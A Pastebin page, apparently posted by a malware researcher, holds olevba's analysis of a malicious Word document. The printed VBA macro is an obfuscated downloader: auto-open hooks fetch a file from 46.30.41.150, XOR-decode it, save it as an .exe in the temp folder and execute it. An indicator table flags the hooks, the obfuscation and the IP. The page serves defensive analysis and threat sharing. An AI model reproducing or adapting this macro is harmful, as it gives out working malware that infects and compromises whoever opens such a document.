API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Oct 27th, 2015
451
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 6.00 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V vbaProject.bin
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vbaProject.bin
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Auto_Open()
  16. naecHWEtHHtbM
  17. End Sub
  18.  
  19. Function oUZDCYSBz(hfgudrRChN, NmLpvABWZN)
  20. Dim DlaQdYZnrwVM
  21. DlaQdYZnrwVM = ""
  22. Dim qGVuetJ
  23. qGVuetJ = 2 - 1
  24. Dim TiGjIdL
  25. TiGjIdL = 1
  26. For TiGjIdL = 1 To Len(hfgudrRChN)
  27. uXelSqetWAbrIT = Mid(NmLpvABWZN, qGVuetJ, 1)
  28. ZTpFUkV = Mid(hfgudrRChN, TiGjIdL, 1)
  29. DlaQdYZnrwVM = DlaQdYZnrwVM & Chr(Asc(ZTpFUkV) Xor Asc(uXelSqetWAbrIT))
  30. qGVuetJ = qGVuetJ + 1
  31. If Len(NmLpvABWZN) < qGVuetJ Then qGVuetJ = 1
  32. Next
  33.  
  34. oUZDCYSBz = DlaQdYZnrwVM
  35. End Function
  36.  
  37. Function pbAvnHvCOcZ(zryqVCxyWrr)
  38. Dim ZPoIibDoJR, JbFyoPNFoRxR, OqzPlKr, XukMzXujgUSsPa, JfAoyNSuxGLcqPL, PXUgFeibPlGgI
  39. Dim ygaoXnJ
  40. ZPoIibDoJR = 1
  41. JbFyoPNFoRxR = 2 - 1
  42. OqzPlKr = 1
  43. ygaoXnJ = LenB(zryqVCxyWrr)
  44. Do While ZPoIibDoJR <= ygaoXnJ
  45. tbdWcuFNGrQl = Chr(AscB(MidB(zryqVCxyWrr, ZPoIibDoJR, 1)))
  46. PXUgFeibPlGgI = PXUgFeibPlGgI & tbdWcuFNGrQl
  47. ZPoIibDoJR = ZPoIibDoJR + 1
  48. OqzPlKr = OqzPlKr + 1
  49. BxvasUlR = 300
  50. If OqzPlKr > BxvasUlR Then
  51. JfAoyNSuxGLcqPL = JfAoyNSuxGLcqPL & PXUgFeibPlGgI
  52. PXUgFeibPlGgI = ""
  53. OqzPlKr = (&H3EF + 2892 - &HF3A)
  54. JbFyoPNFoRxR = JbFyoPNFoRxR + 1
  55. If JbFyoPNFoRxR > 19 + 31 * (&H20 + 1142 - &H491) Then
  56. XukMzXujgUSsPa = XukMzXujgUSsPa & JfAoyNSuxGLcqPL
  57. JfAoyNSuxGLcqPL = ""
  58. JbFyoPNFoRxR = 1
  59. End If
  60. End If
  61. Loop
  62. pbAvnHvCOcZ = XukMzXujgUSsPa & JfAoyNSuxGLcqPL & PXUgFeibPlGgI
  63. End Function
  64.  
  65. Sub naecHWEtHHtbM()
  66. Dim ltFbwRt As String
  67. LYMDaxRkb = ""
  68. tLnHKfZPzbhEI = "r" + "i" + "p"
  69. igWILjykMi = "hehcGpPQydpi" + "l" + "l"
  70. fsGnVrg = Replace(igWILjykMi, "hcGpPQydpi", "")
  71. HXNXvJiLqktuo = LYMDaxRkb + LYMDaxRkb + "WSc" + LYMDaxRkb + tLnHKfZPzbhEI + "t.S" + fsGnVrg + LYMDaxRkb
  72. SxvWbDoY = "" + "" + ".exe"
  73. jthCBDaaJRDpv = "diskdfrg503" & SxvWbDoY
  74. turiqEfvgMad = "Scripting.Fil" + "e" + "Sy" + "s"
  75. ZdLrJNCA = "e" + "c" + "t"
  76. vomJUBHkqH = "te" + "mO" + "b" + "j"
  77. dDNGqIfQPl = turiqEfvgMad + vomJUBHkqH + ZdLrJNCA
  78. Set eUMvBdooBUflklU = CreateObject(dDNGqIfQPl)
  79. UlNkpxXUjx = eUMvBdooBUflklU.GetSpecialFolder(2) & "\" + "\"
  80. lzUiTQJPens = UlNkpxXUjx & jthCBDaaJRDpv
  81. ltFbwRt = (2 + 30 + 1142 - 1169)
  82. LCNEmUMrVtZeK = "" + ".1"
  83. iwDokBl = "WinHt" + "t" + "p" + "."
  84. eYMbfyaRHJCv = iwDokBl + "WinHttp" + "Requ" + "est" + "." + ltFbwRt + LCNEmUMrVtZeK
  85. Set cnzZdwdShJh = CreateObject(eYMbfyaRHJCv, "")
  86.  
  87. zesOpyaWimNkqH = "hcGpPQydpihtthcGpPQydpip://"
  88. XrTdGZXkSzDR = Replace(zesOpyaWimNkqH, "hcGpPQydpi", "")
  89.  
  90. DlaQdYZnrwVM = XrTdGZXkSzDR + "46.30.41" + ".150/" + "bb.ty" + "p"
  91.  
  92. ymgtVbmtxZ = "E" + "T"
  93. BfJmrmZbnp = "G"
  94. cnzZdwdShJh.Open "" + BfJmrmZbnp + ymgtVbmtxZ, DlaQdYZnrwVM, False
  95. cnzZdwdShJh.send
  96. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
  97. eUMvBdooBUflklU.DeleteFile (lzUiTQJPens)
  98. End If
  99. If cnzZdwdShJh.Status = 100 + 100 Then
  100. xUmBoWIKxzpt = True
  101. Set fEHnLYbclJADSdF = eUMvBdooBUflklU.CreateTextFile(lzUiTQJPens, xUmBoWIKxzpt)
  102. YBlkuQGmcR = cnzZdwdShJh.responseBody
  103. fEHnLYbclJADSdF.Write oUZDCYSBz(pbAvnHvCOcZ(YBlkuQGmcR), "nkiO" + "aWs" + "g")
  104. fEHnLYbclJADSdF.Close
  105. End If
  106.    
  107. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
  108. qBLjFDPZAWx = lzUiTQJPens
  109. CreateObject(HXNXvJiLqktuo).Run qBLjFDPZAWx
  110. End If
  111. End Sub
  112.  
  113. Sub AutoOpen()
  114. LxuuCbj = "WOW " + "N" + "u" + "k" + "e"
  115. LxuuCbj = "WOW" + " Nuk" + "e"
  116.     Auto_Open
  117. End Sub
  118. Sub Workbook_Open()
  119.     Auto_Open
  120. End Sub
  121. +------------+----------------------+-----------------------------------------+
  122. | Type       | Keyword              | Description                             |
  123. +------------+----------------------+-----------------------------------------+
  124. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  125. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  126. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  127. | Suspicious | Open                 | May open a file                         |
  128. | Suspicious | Run                  | May run an executable file or a system  |
  129. |            |                      | command                                 |
  130. | Suspicious | CreateObject         | May create an OLE object                |
  131. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  132. |            |                      | strings                                 |
  133. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  134. |            |                      | strings                                 |
  135. | Suspicious | CreateTextFile       | May create a text file                  |
  136. | Suspicious | Write                | May write to a file (if combined with   |
  137. |            |                      | Open)                                   |
  138. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  139. |            |                      | may be used to obfuscate strings        |
  140. |            |                      | (option --decode to see all)            |
  141. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  142. |            | Strings              | may be used to obfuscate strings        |
  143. |            |                      | (option --decode to see all)            |
  144. | IOC        | 46.30.41.150         | IPv4 address (obfuscation: VBA          |
  145. |            |                      | expression)                             |
  146. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!